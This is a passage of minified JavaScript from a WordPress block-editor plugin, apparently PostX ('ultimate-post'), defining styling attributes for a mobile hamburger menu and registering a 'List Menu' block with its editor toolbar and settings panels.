{{hamVClrHvr}}; }"}]},hamVBgHvr:{type:"object",default:{openColor:0,type:"color",color:""},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon:hover"}]},hamVBorderHvr:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:0,left:0},color:"#dfdfdf"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon:hover"}]},hamVRadiusHvr:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon:hover { border-radius: {{hamVRadiusHvr}}; }"}]},hamVShadowHvr:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon:hover"}]},naviIcon:{type:"string",default:"rightAngle2",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}]}]},naviExpIcon:{type:"string",default:"arrowUp2",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuResStructure",condition:"==",value:"mv_accordian"}]}]},naviIconSize:{type:"string",default:"18",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { height: {{naviIconSize}}px; width: {{naviIconSize}}px; }"}]},naviIconClr:{type:"string",default:"#000",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { color: {{naviIconClr}}; }"}]},naviIconClrHvr:{type:"string",default:"#000",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-hammenu-accordian-active > .ultp-menu-item-wrapper >  .ultp-menu-item-label-container > .ultp-menu-item-dropdown svg,\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container .ultp-menu-item-dropdown:hover svg { color: {{naviIconClrHvr}}; }"}]},closeIcon:{type:"string",default:"close_line",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}]}]},closeSize:{type:"string",default:"18",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close svg { height: {{closeSize}}px; width: {{closeSize}}px; }"}]},closeClr:{type:"string",default:"#fff",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close svg { color: {{closeClr}}; }"}]},closeClrHvr:{type:"string",default:"#fff",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close:hover svg { color: {{closeClrHvr}}; }"}]},closeWrapBg:{type:"string",default:"#999999",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close  { background-color: {{closeWrapBg}}; }"}]},closeWrapBgHvr:{type:"string",default:"#ED2A2A",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close:hover  { background-color: {{closeWrapBgHvr}}; }"}]},closeSpace:{type:"object",default:{left:0,unit:"px",right:-44},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close { margin: {{closeSpace}}; }"}]},closePadding:{type:"object",default:{unit:"px",top:"8",right:"8",bottom:"8",left:"8"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close { padding: {{closePadding}}; }"}]},closeRadius:{type:"object",default:{top:"26",right:"26",bottom:"26",left:"26",unit:"px"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close { border-radius: {{closeRadius}}; }"}]},closeBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:0,left:0},color:"#dfdfdf"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-close"}]},menuMvInheritCss:{type:"boolean",default:!1},mvItemColor:{type:"string",default:"#070707",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-text { color: {{mvItemColor}}; }\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container svg { color: {{mvItemColor}}; } "}]},mvItemBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container"}]},mvItemColorHvr:{type:"string",default:"#6044FF",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container:hover .ultp-menu-item-label-text { color: {{mvItemColorHvr}}; }\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container:hover svg { color: {{mvItemColorHvr}}; } "}]},mvItemBgHvr:{type:"object",default:{openColor:0,type:"color",color:"#fff",size:"cover",repeat:"no-repeat",loop:!0},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container:hover"}]},mvItemSpace:{type:"string",default:"0",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-body .ultp-menu-content, \n                        {{ULTP}} .ultp-mobile-view-body { gap: {{mvItemSpace}}px; }"}]},mvItemTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",family:"",weight:400,transform:"capitalize"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-text"}]},mvItemBorder:{type:"object",default:{openBorder:1,width:{top:0,right:0,bottom:1,left:0},color:"#E6E6E6",type:"solid"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container"}]},mvItemRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container { border-radius:{{mvItemRadius}}; }"}]},mvItemPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"",right:"",unit:"px"}},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuMvInheritCss",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-menu-item-label-container { padding:{{mvItemPadding}}; }"}]},mvHeadtext:{type:"string",default:"Menu"},mvHeadBg:{type:"object",default:{openColor:1,type:"color",color:"#F1F1F1",size:"cover",repeat:"no-repeat",loop:!0},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-head"}]},mvHeadPadding:{type:"object",default:{lg:{top:"18",bottom:"18",left:"24",right:"4",unit:"px"}},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-head { padding: {{mvHeadPadding}}; }"}]},mvHeadBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:2,left:0},color:"#dfdfdf"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-head"}]},backClr:{type:"string",default:"#070707",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-back-label { color: {{backClr}}; }\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-back-label-con svg { color: {{backClr}}; }"}]},backClrHvr:{type:"string",default:"#070707",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-back-label-con:hover .ultp-mv-back-label { color: {{backClrHvr}}; }\n                        {{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-back-label-con:hover svg { color: {{backClrHvr}}; }"}]},backTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"capitalize",family:"",weight:"400"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-back-label-con .ultp-mv-back-label"}]},backIcon:{type:"string",default:"leftArrowLg",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}]}]},backIconSize:{type:"string",default:"20",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-back-label-con svg { height: {{backIconSize}}px; width: {{backIconSize}}px; }"}]},backIconSpace:{type:"string",default:"10",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper .ultp-mv-back-label-con { gap: {{backIconSpace}}px; }"}]},mvBodyBg:{type:"object",default:{openColor:1,type:"color",color:"#ffffff",size:"cover",repeat:"no-repeat",loop:!0},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-body"}]},mvOverlay:{type:"string",default:"rgba(0,10,20,.3411764706)",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-container { background: {{mvOverlay}}; }"}]},mvBodyPadding:{type:"object",default:{lg:{top:"16",bottom:"24",left:"16",right:"16",unit:"px"}},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-body { padding: {{mvBodyPadding}}; }"}]},mvBodyBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:2,left:0},color:"#dfdfdf"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-body"}]},mvBodyShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-body"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-menu-wrapper { z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}})},82279:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(87462),a=l(67294),i=l(53049),n=l(99838),r=l(60276);const{__}=wp.i18n,{InspectorControls:s,InnerBlocks:p,BlockControls:c}=wp.blockEditor,{useState:u,useEffect:d,useRef:m,Fragment:g,useMemo:y}=wp.element;function b(e){const t=m(null),[l,b]=u("Content"),{setAttributes:v,name:h,className:f,attributes:k,clientId:w,attributes:{previewImg:x,blockId:T,advanceId:_,dropIcon:C,iconAfterText:E}}=e,S={setAttributes:v,name:h,attributes:k,setSection:b,section:l,clientId:w};d((()=>{const e=w.substr(0,6);T?T&&T!=e&&v({blockId:e}):v({blockId:e})}),[w]),d((()=>{const e=t.current;e?e.iconAfterText==E&&e.dropIcon==C||((0,i.Gu)(w),t.current=k):t.current=k}),[k]);const P=y((()=>(0,n.Kh)(k,"ultimate-post/list-menu",T,!1)),[k,w]);return x?(0,a.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:x}):(0,a.createElement)(g,null,(0,a.createElement)(c,null,(0,a.createElement)(r.w,{isSelected:e.isSelected,clientId:w,store:S})),(0,a.createElement)(s,null,(0,a.createElement)(r.K,{store:S})),(0,a.createElement)("div",(0,o.Z)({},_&&{id:_},{className:`ultp-block-${T} ${f} ultpMenuCss`}),P&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:P}}),(0,a.createElement)("div",{className:"ultp-list-menu-wrapper"},(0,a.createElement)("div",{className:"ultp-list-menu-content"},(0,a.createElement)(p,{template:[["ultimate-post/menu-item",{menuItemText:"List Item"}],["ultimate-post/menu-item",{menuItemText:"List Item"}],["ultimate-post/menu-item",{menuItemText:"List Item"}]],allowedBlocks:["ultimate-post/menu-item"]})))))}},38523:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(87462),a=l(67294);const{InnerBlocks:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l}=e.attributes,n={},r=Object.keys(n);return(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{"data-bid":t,className:`ultp-block-${t} ultpMenuCss`},r&&n),(0,a.createElement)("div",{className:"ultp-list-menu-wrapper"},(0,a.createElement)("div",{className:"ultp-list-menu-content"},(0,a.createElement)(i.Content,null))))}},60276:(e,t,l)=>{"use strict";l.d(t,{K:()=>u,w:()=>c});var o=l(67294),a=l(53049),i=l(87763),n=l(92637);const{ToolbarGroup:r,ToolbarButton:s,Dropdown:p}=wp.components,{__}=wp.i18n,c=e=>{const{clientId:t,isSelected:l,store:n}=e;return(0,o.createElement)(o.Fragment,null,l&&(0,o.createElement)(r,null,(0,o.createElement)(s,{label:"Add Item",icon:i.Z.plus,onClick:()=>{wp.data.dispatch("core/block-editor").insertBlock(wp.blocks.createBlock("ultimate-post/menu-item",{}),999,t,!1)}}),(0,o.createElement)(p,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(s,{label:"Style",icon:i.Z.styleIcon,onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:5,data:{type:"typography",key:"itemTypo",label:__("Typography","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"itemColor",label:__("Color","ultimate-post")},{type:"color2",key:"itemBg",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"toggle",key:"innerCurrItemStyle",label:__("User Hover as Active Color","ultimate-post")},{type:"color",key:"itemColorHvr",label:__("Color","ultimate-post")},{type:"color2",key:"itemBgHvr",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadowHvr",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorderHvr",label:__("Hover Border","ultimate-post")}]}]}},{position:30,data:{type:"dimension",key:"itemRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:40,data:{type:"dimension",key:"itemPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!0,store:n})}),(0,o.createElement)(p,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(s,{label:"Spacing",icon:i.Z.spacing,onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:20,data:{type:"range",key:"listItemGap",min:0,max:100,step:1,responsive:!0,unit:["px"],label:__("Item Gap","ultimate-post")}}],initialOpen:!0,store:n})})),(0,o.createElement)(r,null,(0,o.createElement)(s,{label:"Delete List Menu",icon:i.Z.delete,onClick:()=>{wp.data.dispatch("core/block-editor").removeBlock(t,!0)}})))},u=({store:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"global",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:10,data:{type:"alignment",block:"list-menu",key:"listMenuAlignItems",disableJustify:!0,icons:["left_new","center_new","right_new","alignStretch"],options:["flex-start","center","flex-end","stretch"],label:__("Items Alignment","ultimate-post")}},{position:20,data:{type:"range",key:"listItemGap",min:0,max:100,step:1,responsive:!0,unit:["px"],label:__("Item Gap","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("List Item","ultimate-post"),include:[{position:5,data:{type:"typography",key:"itemTypo",label:__("Typography","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"itemColor",label:__("Color","ultimate-post")},{type:"color2",key:"itemBg",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"itemColorHvr",label:__("Color","ultimate-post")},{type:"color2",key:"itemBgHvr",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadowHvr",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorderHvr",label:__("Hover Border","ultimate-post")}]}]}},{position:30,data:{type:"dimension",key:"itemRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:40,data:{type:"dimension",key:"itemPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Item Icon","ultimate-post"),include:[{position:5,data:{type:"toggle",key:"iconAfterText",label:__("Icon After Text","ultimate-post")}},{position:10,data:{type:"range",key:"iconSize",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"range",key:"iconSpacing",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Spacing","ultimate-post")}},{position:30,data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{position:40,data:{type:"color",key:"iconColorHvr",label:__("Hover Color","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Dropdown Icon","ultimate-post"),include:[{position:5,data:{type:"icon",key:"dropIcon",selection:a.ov,label:__("Choose Icon","ultimate-post")}},{position:10,data:{type:"color",key:"dropColor",label:__("Icon Color","ultimate-post")}},{position:10,data:{type:"color",key:"dropColorHvr",label:__("Icon Hover Color","ultimate-post")}},{position:15,data:{type:"range",key:"dropSize",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"range",key:"dropSpacing",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Text to Icon Spacing","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Background Wrapper","ultimate-post"),include:[{position:30,data:{type:"color2",key:"listMenuBg",image:!1,label:__("Background","ultimate-post")}},{position:40,data:{type:"border",key:"listMenuBorder",label:__("Border","ultimate-post")}},{position:50,data:{type:"boxshadow",key:"listMenuShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}},{position:60,data:{type:"dimension",key:"listMenuRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:70,data:{type:"dimension",key:"listMenuPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!0,store:e})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"range",key:"advanceZindex",label:__("z-index","ultimate-post"),min:-100,max:1e4,step:1}}],initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))))},31145:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(82279),n=l(38523);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/menu/","block_docs"),r("ultimate-post/list-menu",{title:__("List Menu","ultimate-post"),parent:["ultimate-post/menu-item"],icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/menu/list_menu.svg",alt:"List Menu"}),category:"ultimate-post",description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Manage and Customize Menus in a List Format.","ultimate-post")),keywords:[__("menu","ultimate-post"),__("list","ultimate-post")],supports:{html:!1,reusable:!1},example:{attributes:{previewImg:!1}},edit:i.Z,save:n.Z,attributes:{blockId:{type:"string",default:""},previewImg:{type:"string",default:""},listItemGap:{type:"object",default:{lg:"0",ulg:"px"},style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                        .postx-page {{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content { gap: {{listItemGap}};}"}]},listMenuAlignItems:{type:"string",default:"stretch",style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                        .postx-page {{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content { align-items: {{listMenuAlignItems}}; }"}]},listMenuBg:{type:"object",default:{openColor:1,type:"color",color:"#F5F5F5",size:"cover",repeat:"no-repeat",loop:!0},style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content"}]},listMenuBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#D2D2D2"},style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content"}]},listMenuShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff"},style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content"}]},listMenuRadius:{type:"object",default:{lg:{top:4,right:4,bottom:4,left:4,unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content { border-radius:{{listMenuRadius}}; }"}]},listMenuPadding:{type:"object",default:{lg:{top:"12",bottom:"12",left:"8",right:"8",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content { padding:{{listMenuPadding}}; }"}]},dropIcon:{type:"string",default:"rightAngle2"},dropColor:{type:"string",default:"#2E2E2E",style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { color: {{dropColor}}; }'}]},dropColorHvr:{type:"string",default:"#2E2E2E",style:[{selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { color: {{dropColorHvr}}; }'}]},dropSize:{type:"object",default:{lg:"14",ulg:"px"},style:[{selector:'.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { height: {{dropSize}}; width: {{dropSize}}; }'}]},dropSpacing:{type:"object",default:{lg:"64",ulg:"px"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container { gap: {{dropSpacing}}; }'}]},itemTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",family:"",weight:400,transform:"capitalize"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text'}]},itemColor:{type:"string",default:"#2E2E2E",style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColor}}; }'}]},itemBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},innerCurrItemStyle:{type:"toggle",default:!1},itemColorHvr:{type:"string",default:"#6E6E6E",style:[{depends:[{key:"innerCurrItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColorHvr}}; }'},{depends:[{key:"innerCurrItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColorHvr}}; }'}]},itemBgHvr:{type:"object",default:{openColor:1,type:"color",color:"#FFFFFF"},style:[{depends:[{key:"innerCurrItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'},{depends:[{key:"innerCurrItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemShadowHvr:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"innerCurrItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'},{depends:[{key:"innerCurrItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemBorderHvr:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemRadius:{type:"object",default:{top:4,right:4,bottom:4,left:4,unit:"px"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container { border-radius:{{itemRadius}}; }'}]},itemPadding:{type:"object",default:{lg:{top:12,right:12,bottom:12,left:20,unit:"px"}},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container { padding:{{itemPadding}}; }'}]},iconAfterText:{type:"boolean",default:!1},iconSize:{type:"object",default:{lg:"12",ulg:"px"},style:[{selector:'\n                        .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon svg,\n                        .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon img { height: {{iconSize}}; width: {{iconSize}}; }'}]},iconSpacing:{type:"object",default:{lg:"10",ulg:"px"},style:[{selector:'.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label { gap: {{iconSpacing}}; }'}]},iconColor:{type:"string",default:"#000",style:[{selector:'.ultpMenuCss 